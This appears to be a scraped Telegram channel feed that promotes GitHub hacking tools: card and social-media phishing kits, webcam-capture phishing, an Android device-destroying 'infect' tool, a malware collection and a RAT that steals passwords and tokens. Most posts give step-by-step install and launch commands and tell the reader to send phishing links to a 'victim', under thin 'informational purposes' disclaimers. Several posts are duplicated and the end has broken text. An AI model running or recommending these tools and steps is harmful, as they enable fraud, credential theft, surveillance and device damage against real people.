Github tools
2.74K subscribers
33 photos
2 videos
58 files
366 links
Github useful scripts and tools
Download Telegram
Phishing CC

Hello everyone.
Cardesc is a debit/credit card phishing tool. The principle of operation is simple - with the help of social engineering, we convince the victim to go through the page and enter his card details.

Installation:
▪️apt install python3 git
▪️git clone https://github.com/escdroid/cardesc.git
▪️cd cardesc
▪️chmod +x *
▪️pip3 install -r requirements.txt

Usage:
▪️python3 bank.py - run utility
FOR INFORMATION PURPOSES ONLY!

All information is provided for informational purposes only. We are not responsible for your actions.
👍1
Encrypting text into an image

ImSter is a utility that allows you to securely hide and view password-encrypted text inside an image. Text is encoded in image pixels, not metadata. It is impossible to determine by eye whether there is hidden content in the image.

Installation

Install the latest release: https://github.com/armytricks/ImSter/releases/tag/v1.1.2
$ chmod +x ImSter-*.jar

Usage

$ java -jar ImSter-xxx.jar encode -i input.png -o output.png -m "message" -p password

You can read more about using the utility on the official GitHub page of the repository.
1
Convenient phishing Vkontakte

Fisher is a weeman script adapted for copying VK pages.

Installation

$ apt update && apt upgrade
$ apt install python2
$ apt install git
$ git clone https://github.com/foxlitegor/fisher
$ cd fisher
$ chmod 777 install.sh
$ sh install.sh
$fish
$ run

Usage

Create a second session in Termux (swipe from left to right) and write:

$ apt install openssh
$ ssh -R 80:localhost:8080 ssh.localhost.ru

After that, we will generate a phishing link, send it to our “victim” and enjoy the result
All-in-One Hacking Toolkit

VARIOUS is a universal utility with all kinds of hacking scripts.

Installation

$ git clone https://github.com/Err0r-ICA/VARIOUS.git
$ cd VARIOUS

launch

$ python3 Various
Next, enter the password: ICA
New tool for OSINT in Telegram

Telepathy is a tool for collecting information from Telegram chats. At the moment, the utility is able to work only with the source of forwarded messages, the functionality will expand over time.

Installation

$ git clone https://github.com/jordanwildon/Telepathy.git
$ pip install -r requirements.txt
$ run setup.py

launch

$ cd Telepathy
$ python3 setup.py

After that, we launch telepathy.py and add the authorization code from Telegram on the first use. You can learn more about the tool on Github
Hacking a webcam using a phishing attack

CAM DUMPER is a utility that takes a picture from the victim's webcam when clicking on a malicious link.

We have already published several similar tools, however, CAM DUMPER has a number of advantages - the malicious page has the HTTPS protocol, and there is also the ability to record video and sound.

Installation

$ apt update && apt upgrade
$ apt install git php wget curl jq
$ git clone https://github.com/LiNuX-Mallu/CAM-DUMPER.git
$ cd CAM-DUMPER
$ chmod +x camdumper.sh
$ ./camdumper.sh

The developer also recommends installing Material Files, for easy management of captured targets.

Strictly for informational purposes
How to infect any Android device?

Good day! The infection process is carried out using a link. So, the hacker creates a link, after which he throws it to his victim, when the victim clicks on the link, the System Update.apk file is downloaded to her device. As soon as this software is installed, the Android of the victim will begin to be destroyed.

Let's go!

1. For installation is used:
apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ git clone https://github.com/noob-hackers/infect
2. The launch is carried out using the following commands:
$ cd $HOME
$ cd infection
$bash infect.sh
Powerful phishing tool

SuperLink allows you to create a phishing site using a PHP server and Ngrok and generate a link to it. When the victim opens the link, they will be prompted to give some permissions. If the victim clicks on the "allow" button, then we will get his data up to the location.

Installation

$ git clone https://github.com/IHosseini083/SuperLink.git
$cd SuperLink
$ bash linux_installer.sh

Usage

$ python3 SuperLink.py -p (port)
Deanonym of a person from a photo

EagleEye is a utility that allows you to find people's social profiles. networks by their photo and supposed name.

Installation:
▪️git clone https://github.com/ThoughtfulDev/EagleEye
▪️cd EagleEye && sudo pip3 install -r requirements.txt
▪️sudo pip3 install --upgrade beautifulsoup4 html5lib spry

Launch:
▪️python3 eagle-eye.py
Repository with modern malware

Viridae is a collection of viruses for both PC and phone.

Installation

$ pkg update -y;pkg upgrade -y
$ git clone https://github.com/Err0r-ICA/Viridae
$cd Viridae
$ pip2 install -r requirements.txt
$ python2 Viridae

Strictly for informational purposes ✌️
Hacking a webcam using a phishing attack

CAM DUMPER is a utility that takes a picture from the victim's webcam when clicking on a malicious link.

We have already published several similar tools, however, CAM DUMPER has a number of advantages - the malicious page has the HTTPS protocol, and there is also the ability to record video and sound.

Installation

$ apt update && apt upgrade
$ apt install git php wget curl jq
$ git clone https://github.com/LiNuX-Mallu/CAM-DUMPER.git
$ cd CAM-DUMPER
$ chmod +x camdumper.sh
$ ./camdumper.sh

The developer also recommends installing Material Files, for easy management of captured targets.

Strictly for informational purposes ✌️
1
Sending anonymous SMS in Termux

Sms-scammer is a simple script that uses the requests module and a post request to send an anonymous message from a website.

Installation

$ git clone https://github.com/Sanif007/sms-scammer
$ pip install request
$ cd sms-scammer

launch

$ python sms.py
All-in-One Hacking Toolkit

Hello everyone.
VARIOUS is a universal utility with all kinds of hacking scripts.

Installation:
▪️git clone https://github.com/Err0r-ICA/VARIOUS.git
▪️cd VARIOUS

Usage:
▪️python3 Various - run utility
Next, enter the password: ICA

All information is provided for informational purposes only. We are not responsible for your actions.
Repository with modern malware

Viridae is a collection of viruses for both PC and phone.

Installation

$ pkg update -y;pkg upgrade -y
$ git clone https://github.com/Err0r-ICA/Viridae
$cd Viridae
$ pip2 install -r requirements.txt
$ python2 Viridae
My rat tool
https://github.com/youhacker55/jarbou3
Jarbou3 is rat tool coded in python with C&C which can accept multiple connections from clients

Features
C&C server which can accept multiple clients
builder
Undetectable
Steal chrome passwords
Steal Discord Token
Persistence
download + upload files
run powershell commands
spawn other programmes
screenshot
Keylooger
send commands to all clients
download file and exec
1
firefox_decrypt.py
36.7 KB
Download this tool and run it by :

python3 firefox_decrypt.py

Source code : https://github.com/Unode/firefox_decrypt/blob/master/firefox_decrypt.py
​A powerful tool for punching a user by nickname

Snoop is one of the best tools for searching and processing public data on the Internet.
In terms of specialized search, Snoop is able to compete with traditional search engines.

Installation

$ pkg update
$ pkg upgrade
$ apt install git python
$ git clone https://github.com/snooppr/snoop.git
$ cd snoop
$ python3 -m pip install -r requirements.txt

launch

$ python3 snoop.py victim nickname
Universal Phishing Tool!

Phishbait is a working utility for creating phishing pages of 38 popular resources. There is even apple id & Yandex. In short - a must-have for creating phishing.

Installation:
▪️apt install git
▪️git clone https://github.com/Err0r-ICA/Phishbait.git
▪️cd Phishbait

Usage:
▪️bash Phishbait - launch utility‌‌

B
rute force social networks

Blazy is a modern login page brute force tool that allows you to brute force and test CSRF, Clickjacking, Cloudflare and WAF Vulnerability. You can also install and use this tool in Termux for vulnerability analysis.

Installation

$ git clone https://github.com/UltimateHackers/Blazy
$ cd Blazy
$ pip install -r requirements.txt

la
unch

$pyth
on2blazy.py‌‌